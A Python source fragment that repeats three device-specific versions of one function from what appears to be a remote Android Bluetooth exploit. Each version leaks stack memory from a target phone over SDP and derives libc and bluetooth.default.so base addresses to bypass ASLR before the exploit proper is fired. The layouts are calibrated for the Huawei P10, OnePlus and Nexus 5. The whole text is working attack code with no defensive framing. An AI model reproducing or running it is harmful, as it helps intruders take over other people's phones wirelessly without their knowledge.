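def memory_leak_get_bases(src, src_hci, dst, libc_index=(9, 7), bss_index=(5, 3)):
    """Leak stack data over SDP and derive the libc / bluetooth.default.so bases.

    Calls ``bluedroid.do_sdp_info_leak(dst, src)``, picks two leaked pointers
    out of the returned table, subtracts the build-specific constants
    ``LIBC_SOME_BLX_OFFSET`` and ``BLUETOOTH_BSS_SOME_VAR_OFFSET`` (defined
    elsewhere in this file), closes the SDP ACL link with ``hcitool dc`` and
    returns the two bases. The raw leak table is printed for debugging.

    The original hard-coded two device layouts back to back (OnePlus, then
    P10), so only the P10 pair ever took effect; that pair is now the default
    and the layout is a parameter instead of a dead store.

    Args:
        src: local BD address, forwarded to ``do_sdp_info_leak``.
        src_hci: HCI device name; kept for signature compatibility, unused here.
        dst: target BD address; also handed to ``hcitool dc``.
        libc_index: ``(row, column)`` of the leaked libc pointer in the leak
            table. Default ``(9, 7)`` is the P10 layout; OnePlus was ``(2, 5)``.
        bss_index: ``(row, column)`` of the leaked bluetooth.default.so .bss
            pointer. Default ``(5, 3)`` is the P10 layout; OnePlus was ``(3, 3)``.

    Returns:
        ``(libc_text_base, bluetooth_default_bss_base)`` as integers.

    Raises:
        IndexError: the leak table does not have the rows/columns the indices
            expect (different device, firmware or build). The ACL link is
            still closed first.
        ValueError: a computed base is negative, i.e. the picked leak entry is
            not the pointer the offset constants were calibrated against.
            Failing here is preferable to firing the exploit with a bogus base.
    """
    import subprocess  # function-local: the file's import block is not in view

    prog = log.progress('Doing stack memory leak...')
    # The leaked stack "garbage" is deterministic per device/firmware build;
    # the row/column indices are what make this routine device-specific.
    result = bluedroid.do_sdp_info_leak(dst, src)
    print(result)

    try:
        libc_row, libc_col = libc_index
        bss_row, bss_col = bss_index
        try:
            likely_some_libc_blx_offset = result[libc_row][libc_col]
            likely_some_bluetooth_default_global_var_offset = result[bss_row][bss_col]
        except IndexError:
            raise IndexError(
                'SDP leak table has no entry at libc_index=%r / bss_index=%r; '
                'the leak layout differs from the device this was calibrated for'
                % (libc_index, bss_index))

        libc_text_base = likely_some_libc_blx_offset - LIBC_SOME_BLX_OFFSET
        bluetooth_default_bss_base = (likely_some_bluetooth_default_global_var_offset
                                      - BLUETOOTH_BSS_SOME_VAR_OFFSET)
        log.info('libc_base: 0x%08x, bss_base: 0x%08x'
                 % (libc_text_base, bluetooth_default_bss_base))
    finally:
        # Always tear the SDP ACL connection down, even when the leak layout
        # was unexpected. argv form instead of a shell string: dst is
        # operator-supplied, but there is no reason to route it through sh.
        subprocess.call(['hcitool', 'dc', dst])
        # Short settle time before the next connection; presumably lets the
        # controller finish the disconnect -- TODO confirm the value is needed.
        time.sleep(0.1)

    # A negative base means the leak entry was not the pointer the offset
    # constants describe. (A sane text base should also be page-aligned;
    # not enforced here because the constants' alignment is not visible.)
    if libc_text_base < 0 or bluetooth_default_bss_base < 0:
        raise ValueError(
            'implausible base(s): libc_base=%d bss_base=%d from leak values '
            '0x%x / 0x%x -- wrong libc_index/bss_index or offset constants'
            % (libc_text_base, bluetooth_default_bss_base,
               likely_some_libc_blx_offset,
               likely_some_bluetooth_default_global_var_offset))

    prog.success()
    return libc_text_base, bluetooth_default_bss_base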
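def memory_leak_get_bases(src, src_hci, dst, libc_index=(17, 5), bss_index=(2, 8)):
    """Leak stack data over SDP and derive the libc / bluetooth.default.so bases.

    Calls ``bluedroid.do_sdp_info_leak(dst, src)``, dumps the leak table via
    ``print_result`` (defined elsewhere in this file), picks two leaked
    pointers out of it, subtracts the build-specific constants
    ``LIBC_SOME_BLX_OFFSET`` and ``BLUETOOTH_BSS_SOME_VAR_OFFSET`` (also
    defined elsewhere), closes the SDP ACL link with ``hcitool dc`` and
    returns the two bases.

    Args:
        src: local BD address, forwarded to ``do_sdp_info_leak``.
        src_hci: HCI device name; kept for signature compatibility, unused here.
        dst: target BD address; also handed to ``hcitool dc``.
        libc_index: ``(row, column)`` of the leaked libc pointer in the leak
            table. Default ``(17, 5)`` is the Nexus 5 / Android 6.0.1 layout;
            an earlier build of this routine used ``(-3, -2)``.
        bss_index: ``(row, column)`` of the leaked bluetooth.default.so .bss
            pointer. Default ``(2, 8)`` is the Nexus 5 / 6.0.1 layout; the
            earlier build used ``(6, 0)``.

    Returns:
        ``(libc_text_base, bluetooth_default_bss_base)`` as integers.

    Raises:
        IndexError: the leak table does not have the rows/columns the indices
            expect (different device, firmware or build). The ACL link is
            still closed first.
        ValueError: a computed base is negative, i.e. the picked leak entry is
            not the pointer the offset constants were calibrated against.
    """
    import subprocess  # function-local: the file's import block is not in view

    prog = log.progress('Doing stack memory leak...')
    # The leaked stack "garbage" is deterministic per device/firmware build;
    # the row/column indices are what make this routine device-specific.
    result = bluedroid.do_sdp_info_leak(dst, src)
    print_result(result)  # debug dump of the whole leak table

    try:
        libc_row, libc_col = libc_index
        bss_row, bss_col = bss_index
        try:
            likely_some_libc_blx_offset = result[libc_row][libc_col]
            likely_some_bluetooth_default_global_var_offset = result[bss_row][bss_col]
        except IndexError:
            raise IndexError(
                'SDP leak table has no entry at libc_index=%r / bss_index=%r; '
                'the leak layout differs from the device this was calibrated for'
                % (libc_index, bss_index))

        # Raw leaked pointers, before the offset constants are applied.
        log.info("LIBC 0x%08x" % likely_some_libc_blx_offset)
        log.info("BT 0x%08x" % likely_some_bluetooth_default_global_var_offset)

        libc_text_base = likely_some_libc_blx_offset - LIBC_SOME_BLX_OFFSET
        bluetooth_default_bss_base = (likely_some_bluetooth_default_global_var_offset
                                      - BLUETOOTH_BSS_SOME_VAR_OFFSET)
        log.info('libc_base: 0x%08x, bss_base: 0x%08x'
                 % (libc_text_base, bluetooth_default_bss_base))
    finally:
        # Always tear the SDP ACL connection down, even when the leak layout
        # was unexpected. argv form instead of a shell string: dst is
        # operator-supplied, but there is no reason to route it through sh.
        subprocess.call(['hcitool', 'dc', dst])
        # Short settle time before the next connection; presumably lets the
        # controller finish the disconnect -- TODO confirm the value is needed.
        time.sleep(0.1)

    # A negative base means the leak entry was not the pointer the offset
    # constants describe; fail before anything is built on top of it.
    if libc_text_base < 0 or bluetooth_default_bss_base < 0:
        raise ValueError(
            'implausible base(s): libc_base=%d bss_base=%d from leak values '
            '0x%x / 0x%x -- wrong libc_index/bss_index or offset constants'
            % (libc_text_base, bluetooth_default_bss_base,
               likely_some_libc_blx_offset,
               likely_some_bluetooth_default_global_var_offset))

    prog.success()
    return libc_text_base, bluetooth_default_bss_base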
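def memory_leak_get_bases(src, src_hci, dst, libc_index=(-3, -2), bss_index=(6, 0)):
    """Leak stack data over SDP and derive the libc / bluetooth.default.so bases.

    Calls ``bluedroid.do_sdp_info_leak(dst, src)``, picks two leaked pointers
    out of the returned table, subtracts the build-specific constants
    ``LIBC_SOME_BLX_OFFSET`` and ``BLUETOOTH_BSS_SOME_VAR_OFFSET`` (defined
    elsewhere in this file), closes the SDP ACL link with ``hcitool dc`` and
    returns the two bases.

    Args:
        src: local BD address, forwarded to ``do_sdp_info_leak``.
        src_hci: HCI device name; kept for signature compatibility, unused here.
        dst: target BD address; also handed to ``hcitool dc``.
        libc_index: ``(row, column)`` of the leaked libc pointer in the leak
            table; negative values index from the end as usual. Default
            ``(-3, -2)`` is the layout this routine was calibrated for.
        bss_index: ``(row, column)`` of the leaked bluetooth.default.so .bss
            pointer. Default ``(6, 0)``.

    Returns:
        ``(libc_text_base, bluetooth_default_bss_base)`` as integers.

    Raises:
        IndexError: the leak table does not have the rows/columns the indices
            expect (different device, firmware or build). The ACL link is
            still closed first.
        ValueError: a computed base is negative, i.e. the picked leak entry is
            not the pointer the offset constants were calibrated against.
    """
    import subprocess  # function-local: the file's import block is not in view

    prog = log.progress('Doing stack memory leak...')
    # The leaked stack "garbage" is deterministic per device/firmware build;
    # the row/column indices are what make this routine device-specific.
    result = bluedroid.do_sdp_info_leak(dst, src)

    try:
        libc_row, libc_col = libc_index
        bss_row, bss_col = bss_index
        try:
            likely_some_libc_blx_offset = result[libc_row][libc_col]
            likely_some_bluetooth_default_global_var_offset = result[bss_row][bss_col]
        except IndexError:
            raise IndexError(
                'SDP leak table has no entry at libc_index=%r / bss_index=%r; '
                'the leak layout differs from the device this was calibrated for'
                % (libc_index, bss_index))

        libc_text_base = likely_some_libc_blx_offset - LIBC_SOME_BLX_OFFSET
        bluetooth_default_bss_base = (likely_some_bluetooth_default_global_var_offset
                                      - BLUETOOTH_BSS_SOME_VAR_OFFSET)
        log.info('libc_base: 0x%08x, bss_base: 0x%08x'
                 % (libc_text_base, bluetooth_default_bss_base))
    finally:
        # Always tear the SDP ACL connection down, even when the leak layout
        # was unexpected. argv form instead of a shell string: dst is
        # operator-supplied, but there is no reason to route it through sh.
        subprocess.call(['hcitool', 'dc', dst])
        # Short settle time before the next connection; presumably lets the
        # controller finish the disconnect -- TODO confirm the value is needed.
        time.sleep(0.1)

    # A negative base means the leak entry was not the pointer the offset
    # constants describe; fail before anything is built on top of it.
    if libc_text_base < 0 or bluetooth_default_bss_base < 0:
        raise ValueError(
            'implausible base(s): libc_base=%d bss_base=%d from leak values '
            '0x%x / 0x%x -- wrong libc_index/bss_index or offset constants'
            % (libc_text_base, bluetooth_default_bss_base,
               likely_some_libc_blx_offset,
               likely_some_bluetooth_default_global_var_offset))

    prog.success()
    return libc_text_base, bluetooth_default_bss_base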